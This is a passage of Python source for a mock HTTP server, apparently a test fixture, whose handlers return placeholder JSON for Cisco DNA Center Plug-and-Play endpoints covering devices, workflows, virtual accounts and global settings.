'string', 'name': 'string', 'id': 'string', 'description': 'string', 'deviceType': 'string', 'platformId': {}, 'family': {}, 'ip': 'string', 'softwareVersion': {}, 'userId': {}, 'nodeType': 'string', 'radioFrequency': {}, 'clients': {}, 'count': {}, 'healthScore': 0, 'level': 0, 'fabricGroup': {}, 'connectedDevice': {}}], 'links': [{'source': 'string', 'linkStatus': 'string', 'label': ['string'], 'target': 'string', 'id': {}, 'portUtilization': {}}]}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_0b836b7b4b6a9fd5(self):
return re.search(
self.PNP_0b836b7b4b6a9fd5_PATTERN,
self.path
)
def pnp_un_claim_device_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'jsonArrayResponse': [{}], 'jsonResponse': {}, 'message': 'string', 'statusCode': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_0a9c988445cb91c8(self):
return re.search(
self.PNP_0a9c988445cb91c8_PATTERN,
self.path
)
def pnp_get_sync_resultfor_virtual_account_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_09b0f9ce4239ae10(self):
return re.search(
self.PNP_09b0f9ce4239ae10_PATTERN,
self.path
)
def pnp_update_device_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_2499e9ad42e8ae5b(self):
return re.search(
self.PNP_2499e9ad42e8ae5b_PATTERN,
self.path
)
def pnp_deregister_virtual_account_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_1e962af345b8b59f(self):
return re.search(
self.PNP_1e962af345b8b59f_PATTERN,
self.path
)
def pnp_add_virtual_account_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_21a6db2540298f55(self):
return re.search(
self.PNP_21a6db2540298f55_PATTERN,
self.path
)
def pnp_import_devicesinbulk_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'successList': [{'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'}], 'failureList': [{'index': 0, 'serialNum': 'string', 'id': 'string', 'msg': 'string'}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_3086c9624f498b85(self):
return re.search(
self.PNP_3086c9624f498b85_PATTERN,
self.path
)
def pnp_update_workflow_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_3cb24acb486b89d2(self):
return re.search(
self.PNP_3cb24acb486b89d2_PATTERN,
self.path
)
def pnp_get_smart_account_list_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps(['string'])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_5889fb844939a13b(self):
return re.search(
self.PNP_5889fb844939a13b_PATTERN,
self.path
)
def pnp_claima_devicetoa_site_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 'string', 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_6f9819e84178870c(self):
return re.search(
self.PNP_6f9819e84178870c_PATTERN,
self.path
)
def pnp_update_pnp_server_profile_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_7989f86846faaf99(self):
return re.search(
self.PNP_7989f86846faaf99_PATTERN,
self.path
)
def pnp_get_workflow_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_70a479a6462a9496(self):
return re.search(
self.PNP_70a479a6462a9496_PATTERN,
self.path
)
def pnp_get_virtual_account_list_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps(['string'])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_7e92f9eb46db8320(self):
return re.search(
self.PNP_7e92f9eb46db8320_PATTERN,
self.path
)
def pnp_get_pnpglobalsettings_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'savaMappingList': [{'syncStatus': 'string', 'syncStartTime': 0, 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'lastSync': 0, 'tenantId': 'string', 'profile': {'port': 0, 'addressIpV4': 'string', 'addressFqdn': 'string', 'profileId': 'string', 'proxy': True, 'makeDefault': True, 'cert': 'string', 'name': 'string'}, 'token': 'string', 'expiry': 0, 'ccoUser': 'string', 'smartAccountId': 'string', 'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string'}], 'taskTimeOuts': {'imageDownloadTimeOut': 0, 'configTimeOut': 0, 'generalTimeOut': 0}, 'tenantId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'defaultProfile': {'fqdnAddresses': ['string'], 'proxy': True, 'cert': 'string', 'ipAddresses': ['string'], 'port': 0}, 'acceptEula': True, 'id': 'string', '_id': 'string', 'version': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_8da0391947088a5a(self):
return re.search(
self.PNP_8da0391947088a5a_PATTERN,
self.path
)
def pnp_update_pnpglobalsettings_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'savaMappingList': [{'syncStatus': 'string', 'syncStartTime': 0, 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'lastSync': 0, 'tenantId': 'string', 'profile': {'port': 0, 'addressIpV4': 'string', 'addressFqdn': 'string', 'profileId': 'string', 'proxy': True, 'makeDefault': True, 'cert': 'string', 'name': 'string'}, 'token': 'string', 'expiry': 0, 'ccoUser': 'string', 'smartAccountId': 'string', 'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string'}], 'taskTimeOuts': {'imageDownloadTimeOut': 0, 'configTimeOut': 0, 'generalTimeOut': 0}, 'tenantId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'defaultProfile': {'fqdnAddresses': ['string'], 'proxy': True, 'cert': 'string', 'ipAddresses': ['string'], 'port': 0}, 'acceptEula': True, 'id': 'string', '_id': 'string', 'version': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_848b5a7b4f9b8c12(self):
return re.search(
self.PNP_848b5a7b4f9b8c12_PATTERN,
self.path
)
def pnp_adda_workflow_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_a4b6c87a4ffb9efa(self):
return re.search(
self.PNP_a4b6c87a4ffb9efa_PATTERN,
self.path
)
def pnp_sync_virtual_account_devices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_9e857b5a4a0bbcdb(self):
return re.search(
self.PNP_9e857b5a4a0bbcdb_PATTERN,
self.path
)
def pnp_reset_device_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'jsonArrayResponse': [{}], 'jsonResponse': {}, 'message': 'string', 'statusCode': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_af8d7b0e470b8ae2(self):
return re.search(
self.PNP_af8d7b0e470b8ae2_PATTERN,
self.path
)
def pnp_delete_workflow_by_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_cdab9b474899ae06(self):
return re.search(
self.PNP_cdab9b474899ae06_PATTERN,
self.path
)
def pnp_delete_deviceby_idfrom_pnp_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 